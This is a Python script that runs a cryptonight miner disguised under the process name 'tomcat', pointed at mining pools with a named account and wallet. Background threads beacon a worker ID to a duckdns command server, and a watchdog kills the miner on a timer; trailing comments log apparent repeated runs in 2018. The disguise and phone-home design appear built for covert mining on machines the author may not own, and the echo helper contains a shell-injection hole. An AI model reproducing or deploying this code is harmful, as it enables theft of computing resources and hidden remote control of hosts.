import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:07.584290
#2018-02-17 16:26:06.255629
#2018-02-17 18:13:04.241973
#2018-02-17 20:00:06.909139
#2018-02-17 21:48:07.628250
#2018-02-17 23:33:03.915535
#2018-02-18 01:22:04.644832
#2018-02-18 03:10:04.239238
#2018-02-18 04:57:05.835603
#2018-02-18 06:48:06.303578
#2018-02-18 08:39:03.823402
#2018-02-18 10:25:06.128854
#2018-02-18 12:11:04.281657
#2018-02-18 13:57:01.229188
#2018-02-18 15:47:05.960900
#2018-02-18 17:38:04.527913
#2018-02-18 19:26:04.109990
#2018-02-18 21:11:06.266766
#2018-02-18 22:58:03.260475
#2018-02-19 00:46:01.651778
#2018-02-19 02:33:01.556746
#2018-02-19 04:19:06.898679
#2018-02-19 06:03:04.305987
#2018-02-19 07:51:05.322759
#2018-02-19 09:42:01.508500
#2018-02-19 11:31:06.511937
#2018-02-19 13:18:06.155956
#2018-02-19 15:06:08.857108
#2018-02-19 16:55:03.805204
#2018-02-19 18:41:10.651688
#2018-02-19 20:28:04.564119
#2018-02-19 22:15:07.158925
#2018-02-20 00:02:07.250471
#2018-02-20 01:48:07.696198
#2018-02-20 03:37:01.659548
#2018-02-20 05:24:01.858993
#2018-02-20 07:07:05.554493
#2018-02-20 08:53:04.794844
#2018-02-20 10:37:01.523241
#2018-02-20 12:23:01.499780
#2018-02-20 14:09:01.694446
#2018-02-20 15:52:15.551490
#2018-02-20 17:38:09.403010
#2018-02-20 19:26:06.842765
#2018-02-20 21:15:09.187642
#2018-02-20 23:01:01.612730
#2018-02-21 00:44:05.140949
#2018-02-21 02:30:04.582705
#2018-02-21 04:17:02.127012
#2018-02-21 06:03:07.256463
#2018-02-21 07:50:04.289484
#2018-02-21 09:34:01.220705
#2018-02-21 11:23:02.044425
#2018-02-21 13:11:08.029940
#2018-02-21 14:57:09.268042
#2018-02-21 16:47:07.579924
#2018-02-21 18:38:08.922839
#2018-02-21 20:23:06.780206
#2018-02-21 22:12:05.338976
#2018-02-22 00:01:07.815411
#2018-02-22 01:48:03.633952
#2018-02-22 03:35:07.203385
#2018-02-22 05:22:04.934915
#2018-02-22 07:08:06.054328
#2018-02-22 08:56:07.936373
#2018-02-22 10:44:01.720752
#2018-02-22 12:31:05.947197
#2018-02-22 14:15:08.433379
#2018-02-22 16:02:04.656539
#2018-02-22 17:49:05.997052
#2018-02-22 19:37:04.528795
#2018-02-22 21:28:06.236908
#2018-02-22 23:15:06.474270
#2018-02-23 00:59:07.535707
#2018-02-23 02:46:05.663590
#2018-02-23 04:34:01.702597
#2018-02-23 06:19:01.415052
#2018-02-23 08:06:06.465053
#2018-02-23 10:22:06.600793
#2018-02-23 12:17:03.944136
#2018-02-23 14:04:07.291301
#2018-02-23 15:54:01.754811
#2018-02-23 17:39:06.684635
#2018-02-23 19:27:07.978013
#2018-02-23 21:12:06.113655
#2018-02-23 22:57:04.903873
#2018-02-24 00:44:04.975623
#2018-02-24 02:38:01.276857
#2018-02-24 04:32:04.547183
#2018-02-24 06:17:05.140583
#2018-02-24 08:05:03.211941
#2018-02-24 09:49:05.178182
#2018-02-24 11:44:07.381732
#2018-02-24 13:36:07.851212
#2018-02-24 15:24:01.442583
#2018-02-24 17:13:07.132974
#2018-02-24 19:05:04.257320
#2018-02-24 20:53:06.885648
#2018-02-24 23:14:03.838658
#2018-02-25 03:24:08.117232
#2018-02-25 07:04:06.065513